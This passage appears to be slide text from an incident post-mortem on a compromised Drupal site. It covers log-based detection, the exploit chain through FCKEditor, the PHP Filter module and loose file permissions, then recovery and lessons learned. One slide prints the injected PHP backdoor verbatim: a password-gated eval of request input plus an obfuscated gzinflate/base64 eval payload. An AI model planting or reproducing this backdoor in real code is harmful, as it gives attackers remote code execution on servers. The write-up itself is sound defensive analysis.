  • 19. 12:18 “Update: Armorial down for 1.5 hours, server side issue? maybe caching?”
  • 20.
  • 21.
  • 22. Symptom or root problem? Chef ? MySQL error? Restart Apache? Restart server? Recent OS updates? PHP versions? Drupal Customizations? Anything updated in Drupal? Hacked !?#%$&!
  • 23. Detection - apache log analysis - looked for odd traffic patterns - in particular, isolated all wp-conf requests - “hack” attempt started a couple of weeks before - successful injection occurred the day before
  • 24. Exploit... FCKEditor Bug - allows XSS attacks Sources: https://drupal.org/node/1482528 http://webcache.googleusercontent.com/search?q=cache:http://exploitsdownload .com/exploit/na/drupal-fckeditorckeditor-php-execution
  • 25. … + PHP Execution... PHP Filter Module - core module that allows ‘client’ PHP execution - disabled by default
  • 26. … + Permission issues... Incorrect rwx permissions for sites/default/files - allowed user uploaded files to be executable by www- data - www-data also had write permissions to /var/www!
  • 27. … = Code Injection Snippet found inserted at the top of random PHP files throughout the site: if(isset($_REQUEST['ch']) && (md5($_REQUEST['ch']) == 'edd1d65d726121336405c4d2554df925') && isset($_REQUEST['php_code'])) { eval($_REQUEST['php_code']); exit(); } eval(gzinflate(base64_decode('y0zTyCwuTi3RUIkPcg0MdQ0OiVZPzlCP1VRQU1 PQyE0xxZSwtVVQT01JMUwxM00xNzIzNDI0NjYzMTBNNkkxMjU1SUmzNDJVB+ vHMLkgoyA+OT8lFWiMpkK1QmpZYg4OaWuF1IrMEg0gXQsA'))); Reversing gzinflate:
  • 29. Risk Exposure - hijack/deface site - ransomware => blackmail - host their own content - execute phishing attacks - gain access to other sites on server (if any) - exploit OS vulnerabilities
  • 30. Risk Exposure - use Drupal’s settings.php to gain access to the database/salt - harvest public/private site content - access personal user information (including passwords!!) - access other dbs/sites if they use the same credentials
  • 31. The Recovery - Restoration - restored site from a couple of days prior - all servers are backed up nightly (incl. files and db) - at most 48 hours of data loss - correct file-system permissions - disabled FCKEditor, PHP Filter modules - reset Drupal admin password - changed all site users’ passwords
  • 32. The Recovery - Communication - contacted all potentially affected site members - clear, honest communication - possibility of personal information being leaked - possibility passwords might have been compromised - do users use same passwords for other services?
  • 33. Lessons Learned - Drupal - first real Drupal problem - follow Drupal security guidelines! - https://drupal.org/security/secure-configuration - vet the required core, contrib and custom modules for project - stay on top of the updates - test patches and updates and implement rapidly - use https for all secure pages (whenever possible) - install security modules - Security Review, Security Kit, Login Security, ... - if developing, use Drupal’s built-in checking functions
  • 34. Lessons Learned - Operational - review site security policies - enforcement: periodic security sweeps - tight control on production environments - protect the core code with version control - use https whenever authentication is involved - mod_security to block attacks - establish security analysis practices - metrics - traffic analysis - log triggers and notifications
  • 35. Embrace Failure - Failure rarely has a single cause: - systems are very complex, many interdependencies - answers are not necessarily obvious - weakness can be latent, triggered by other flaws - red herrings - swiss cheese
  • 36. Source: John Allspaw: Advanced PostMortem Fu and Human Error 101 http://www.slideshare.net/jallspaw/advanced-postmortem-fu-and-human-error-101- velocity-2011
  • 37. Lessons Learned - Cultural - Everyone must have the organization’s end goals in mind - Team of experts or team of poly-skilled polyglots? - Emergency roles may differ from normal roles - Emergency communication channels must be defined - Failure rehearsals: deliberately break things: - The culture must be free of blame